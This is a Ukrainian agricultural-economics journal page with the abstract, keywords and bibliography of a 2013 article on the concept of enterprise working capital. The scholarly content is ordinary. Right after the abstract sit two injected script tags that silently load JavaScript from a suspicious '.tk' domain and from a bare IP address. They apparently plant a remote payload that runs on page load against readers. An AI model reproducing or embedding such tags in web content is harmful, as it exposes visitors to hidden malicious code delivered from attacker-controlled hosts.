ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.10:652
Сторінка молодого науковця

Економічна сутність категорії „оборотні засоби підприємств” / Василішин С. І. // Економіка АПК. - 2013. - № 1 - С. 147

Проаналізовано генезис розуміння та визначення економічної сутності категорії «оборотні засоби підприємства», її співвідношення з категоріями «оборотні активи», «оборотний капітал» і «оборотні кошти». Наголошено на доцільності використання терміна «оборотні засоби» з позиції їх закріплення за підприємством як складової частини виробничих ресурсів. Рис.: 1. Бібліогр.: 15.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ринкова економіка, оборотні засоби підприємства, ресурсний потенціал, авансований капітал, господарські процеси

Список використаних джерел

 1. Андрійчук В.Г. Економіка аграрних підприємств: підручник. - 2-ге вид., доп. і перероб. / В.Г. Андрійчук. - К.: КНЕУ, 2002. - С. 312.
 2. Базилевич В.Д. Історія економічни учень: підруч. у 2 ч. - Ч. 1/за ред. В. Д. Базилевича. - 3-тє вид., випр. і доп. - К: Знання, 2006. - 582 с.
 3. БланкИА. Финансовый менеджмент: учебный курс / И.А Бланк. - К.: Эльга, Ника-Центр, 2004. - 656 с.
 4. ГриньоваВМ. Тлумачний словник економічних термінів: навч. посіб. / В. М. Гриньова, В. О. Коюда - X.: ВД «ІНЖЕК», 2003 . - С. 16.
 5. ДемьяненкоН.Я. Повышение отдачи оборотных средств колхозов / Н.Я. Демьяненко. - К.: Урожай, 1988. - С. 6.
 6. Кузнецов В. Положення (стандарти) бухгалтерського обліку / В. Кузнецов. - X.: Фактор, 2009. - С. 14.
 7. Маркс К. Капитал. Критика политической экономии. Т. II. Кн. 2 / Процесс обращения капитала/издан под ред. Ф. Энгельса. - М: Политиздат, 1984. - С. 178.
 8. Милль Дж. Ст. Основания политической экономии / Дж. Ст. Милль ; под. ред. О.И. Остроградского. - К.: Типог. И.И. Чоколова, 1896. - С. 90.
 9. ПизенгольцМ.З. Оборотные средства колхозов / М. 3. Пизенгольц. - М.: Экономика, 1968. - С. 25.
 10. Поддерьогін А. М. Фінанси підприємств: підруч. / А. М. Поддєрьогін, М. Д. Білик, Л. Д. Буряк та ін. - 5-те вид., перероб. і доп. - К.:КНЕУ, 2004. - С. 189.
 11. Роштейн Л.А. Оборотные средствав промышленности / Л. А. Роштейн. - М.: ФиС, 1986. - С. 61.
 12. Скворцов А. Основания политической экономии / А. Скворцов. - СПб.: Тип. И. Гольдберга, 1898. - 432 с.
 13. Шигун ММ. Фактор виробництва та засоби виробництва: економічна природа та взаємозв'язок категорій / М. М. Шигун, В. В. Бондарчук // Вісн. ЖДТУ: Економічні науки. - 2011. - №2 (56). - С. 172-178.
 14. Энциклопедический словарь: в 58 т. /под ред. Ю. С. Гамбарова [и др.]. - 7-е изд., совершенно перераб. - М.: Бр. А. и И. Гранат и К° [до 1917 г.]. - Т. 23. - 452 с.
 15. ЯдгаровЯ.С. История экономических учений: учеб. для вузов / Я. С. Ядгаров. - Изд. 4-е, перераб. и доп. - М.: ИНФРА-М, 2001. - 480 с.
Читати статтю: 13_01_24.pdf